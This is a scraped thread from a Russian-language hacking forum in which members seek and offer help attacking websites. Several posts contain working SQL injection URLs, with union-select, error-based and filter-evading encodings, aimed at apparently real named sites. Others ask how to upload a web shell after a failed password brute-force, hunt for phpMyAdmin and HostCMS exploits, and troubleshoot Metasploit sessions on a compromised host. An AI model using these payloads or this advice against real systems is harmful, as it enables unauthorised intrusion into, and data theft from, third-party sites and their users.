Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. hakwar

    hakwar New Member

    Joined:
    25 Dec 2010
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Спасибо
     
  2. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    _http://profclinic.ru/search/?search_string=oops'&x=0&y=0
    _http://profclinic.ru/search/?search_string=oopss%27%29%0AAND%0A5851=5851%0Aunion%0Aall%0Aselect%0A1,2,3,4,5,6,7,8,%0A%23&x=0&y=0

    Пробелы на %0A корректно заменяются, с запятой сложнее. Начало параметра лучше рандомизировать, т.к. где-то на пути кеширование.
     
  3. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Error-based:
    Code:
    [I]o[/I][I]ops%27%29or[/I][I]%281%29group%09by%09[/I][I]mid%28%28SELEC[/I][I]T%09version[/I][I]%28%29%29[/I][I]%09from%09ra[/I][I]nd%280%29%09for[/I][I]%099e9%29%[/I][I]09having%09min%28[/I][I]0%29%23&x=0&y=0[/I]
    
    Duplicate entry 'version' for key 'group_key
    См. https://rdot.org/forum/showthread.php?t=245, последний пост с вектором без использования запятых.
     
    #23303 randman, 13 Jun 2014
    Last edited: 8 Jul 2014
    1 person likes this.
  4. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    XAMEHA, да, примерно так и работал. Спасибо за линк.

    Возник вопрос по жумле. Если нигде на морде нет уютной кнопки "восстановить пароль", значит ли это, что в двиге фича рестора выключена? Если нет, какие у 1.5 ветки прямые линки на запрос восстановления и на ввод кода с почты?
     
  5. ice99

    ice99 Banned

    Joined:
    4 Dec 2009
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    А подскажите следующую вещь.
    В armitage применяю эксплоит, всё успешно.
    потом получаю доступ к файловой системе и cmd.
    Но, когда пытаюсь запустить какое-нибудь приложение (которое я забросил юзеру), оно или не запускается, или висит в процессах, в общем ведет себя неадекватно.
    Например ,вызываю удаленную консоль, набираю в ней

    C:\Windows\system32> notepad.exe

    Блокнот на удаленной ХР запускается, но только висит в процессах, без всякого GUI (т.е. приложение визуально не открывается). То же самое и с другими ехе-шниками.

    Такая же история с
    meterpreter> execute -f notepad.exe
    Процесс появляется, но визуально блокнот не запускается
     
  6. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Видимо, у них давилка окон есть, чтобы случайно что-нибудь не вылезло. В winapi есть какие-то ключики для этого. Попробуйте либо почитать доки от msf, либо запилить notepad в батник.
     
  7. -=Cerberus=-

    -=Cerberus=- κρυπτός γράφω

    Joined:
    29 Apr 2012
    Messages:
    1,321
    Likes Received:
    930
    Reputations:
    391

    а может быть там Windows 2008 консольная версия установлена?
     
  8. ice99

    ice99 Banned

    Joined:
    4 Dec 2009
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Да нет, система XP моя, поставил для опытов. Причем БЕЗ сервиспаков. Нулевая можно сказать. Ни антивируса, ни давилки, ничего осложняющего.
     
  9. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Я имею в виду шеллы msf, которые делают exec без рендера окон.
     
  10. ice99

    ice99 Banned

    Joined:
    4 Dec 2009
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    запилил.
    содержание файла
    "start C:\Windows\System32\notepad.exe"
    та же песня, блокнот запускается без gui
     
  11. KSIVIT

    KSIVIT New Member

    Joined:
    27 Sep 2012
    Messages:
    3
    Likes Received:
    0
    Reputations:
    -2
    Привет всем)
    У меня такая проблема: есть phpMyAdmin 2.11.11.3
    Версия достаточно старая, но никакого сплойта не могу найти, активное гуглование не помогает.
    Подскажите знающие пожалуйста)
     
  12. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Давайте повангую. Есть /scripts/setup.php, но не /config/. До кучи /phpmyadmin/ + /pma/ по всем соседям, но плоентов нет. И да, по эту версию так и не нашлось ничего стоящего.
     
  13. KSIVIT

    KSIVIT New Member

    Joined:
    27 Sep 2012
    Messages:
    3
    Likes Received:
    0
    Reputations:
    -2
    Есть такое: /config.inc.php/ но при открытии пишет только это ?> и да, setup есть :)
     
  14. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Как залить шелл, какой вариант? Пароли сбрутить не удалось

    Code:
    
    http://fisher.spb.ru/news/message-bycatalog.php?category=2&water=-135+union+select+1,(select(@x)from(select(@x:=0x00),(select(null)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),3,4,5,6+--+
    
     
     
    #23314 er9j6@, 14 Jun 2014
    Last edited: 14 Jun 2014
  15. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    1. Исследование соседей.
    2. Пошаманьте с /Club/contest/vne/forum/gallery/index.php?event=addform&gid=&se=-300154264
     
  16. EksTasy

    EksTasy Member

    Joined:
    26 Oct 2008
    Messages:
    69
    Likes Received:
    6
    Reputations:
    10
    Можно ли что-нибудь сделать? максимум чего добился - это ошибки в
     
  17. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Сайт постороен на базе HostCMS. Ищите паблик эксплоиты, если не найдете- качайте исходники этой CMS (на сайте есть, правда с ограничением), и проводите анализ.
     
  18. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    70
    Likes Received:
    12
    Reputations:
    1
    Интересует следующий вопрос:
    1. Есть сайт site.com с шеллом на нём. Также, имеется доступ к серверу из под Root-а.
    Проблема, конечно не совсем прямо относится к уязвимостям, но всё же, для проверки возможности редактирования файлов и правильности путей был выбран файл в корне x.php, содержание которого:
    HTML:
    <?php
    
    print "server_test1_for_admin";
    
    ?>
    При изменении текста текста в print-е - ничего не происходит.
    При изменении имени файла на x1.php - файл становится не доступен по адресу site.com/x.php и становится доступен по адресу site.com/x1.php, т.е. всё вроде бы нормально, но текст в x.php и x1.php всё равно один и тот же :mad:
    Дело, навряд ли в корневом htaccess:

    Code:
    AddDefaultCharset UTF-8
    
    #RewriteEngine on
    #RewriteCond %{REQUEST_URI} !/1.html$
    ##RewriteCond %{REMOTE_HOST} !^888\.888\.888\.888
    #RewriteRule $ /1.html [R=302,L]
    
    
    # compress all text & html:
    #AddOutputFilterByType DEFLATE text/html text/plain text/xml
    
    
    RewriteEngine on
    
    # Redirects to www. version
    RewriteCond %{HTTP_HOST} ^site\.com [NC]
    RewriteRule ^(.*)$ http://www.site.com/$1 [L,R=301]
    
    RewriteCond %{HTTP_HOST} ^site\.com [NC]
    RewriteRule ^(.*)$ http://www.site.com/$1 [L,R=301]
    
    RewriteCond %{HTTP_HOST} ^site1\.com [NC]
    RewriteRule ^(.*)$ http://www.site1.com/$1 [L,R=301]
    
    RewriteCond %{HTTP_HOST} ^site1\.com [NC]
    RewriteRule ^(.*)$ http://www.site1.com/$1 [L,R=301]
    
    # Send all requests except some to index.php
    RewriteCond %{REQUEST_URI} !^/1/
    RewriteCond %{REQUEST_URI} !^/2/
    RewriteCond %{REQUEST_URI} !^/3/
    RewriteCond %{REQUEST_URI} !^/4/
    RewriteCond %{REQUEST_URI} !^/5/
    RewriteRule ^(.+)$ index.php [L]
    
    
    Order allow,deny
    Allow from all
    
    Deny from IP1
    Deny from IP2
    
    В чём может быть причина, если не в корневом хтаче?
    В какую сторону копать?
     
  19. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Aniweste, скорее всего, кеширование либо на сервере, либо на стороне клиента. Вопрос банальный, но кеш чистили? Попробуйте "приватный режим" или другой браузер. И попробуйте заменить .php на .txt.
     
  20. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    70
    Likes Received:
    12
    Reputations:
    1
    Спасибо за ответ. Кеширование точно не на стороне клиента. Пробовал и другой браузер и очистку кеша.
    Тогда прошу помощи в доп. вопросе - если кеширование на стороне сервера, то где располагается кеш?
    В корне сайта нету папок, в которых были бы кешированные страницы, тогда где они могли бы быть? :eek:
     
    #23320 Aniweste, 18 Jun 2014
    Last edited: 18 Jun 2014
Thread Status:
Not open for further replies.